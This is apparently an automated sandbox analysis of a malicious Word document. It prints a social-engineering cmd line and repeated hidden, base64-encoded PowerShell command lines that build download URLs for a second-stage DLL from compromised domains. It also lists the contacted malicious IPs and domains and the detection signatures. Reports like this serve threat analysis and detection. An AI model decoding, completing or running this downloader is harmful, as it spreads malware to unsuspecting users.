Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 336937 Sample: Informacion_29.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 96 22 Multi AV Scanner detection for submitted file 2->22 24 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->24 26 Suspicious powershell command line found 2->26 28 9 other signatures 2->28 6 cmd.exe 2->6         started        9 WINWORD.EXE 293 25 2->9         started        process3 signatures4 30 Suspicious powershell command line found 6->30 32 Very long command line found 6->32 34 Encrypted powershell cmdline option found 6->34 36 PowerShell case anomaly found 6->36 11 powershell.exe 12 9 6->11         started        14 msg.exe 6->14         started        process5 dnsIp6 16 rycomputer.com 58.97.195.135, 443, 49168, 49169 TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH Bangladesh 11->16 18 thebestfikrah.com 103.8.25.63, 49172, 80 SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY Malaysia 11->18 20 5 other IPs or domains 11->20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
66.85.46.76
unknown United States
393960 HOST4GEEKS-LLCUS true
103.8.25.63
unknown Malaysia
132241 SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY true
58.97.195.135
unknown Bangladesh
7470 TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH true
35.214.169.246
unknown United States
19527 GOOGLE-2US true
193.187.117.26
unknown Netherlands
55933 CLOUDIE-AS-APCloudieLimitedHK true
70.32.23.58
unknown United States
55293 A2HOSTINGUS true
35.209.78.196
unknown United States
19527 GOOGLE-2US true

Contacted Domains

Name IP Active
rycomputer.com 58.97.195.135 true
phawayagency.com 35.209.78.196 true
00zyku.com 193.187.117.26 true
wheelcomoving.com 66.85.46.76 true
thebestfikrah.com 103.8.25.63 true
d-cem.com 35.214.169.246 true
ketoresetme.com 70.32.23.58 true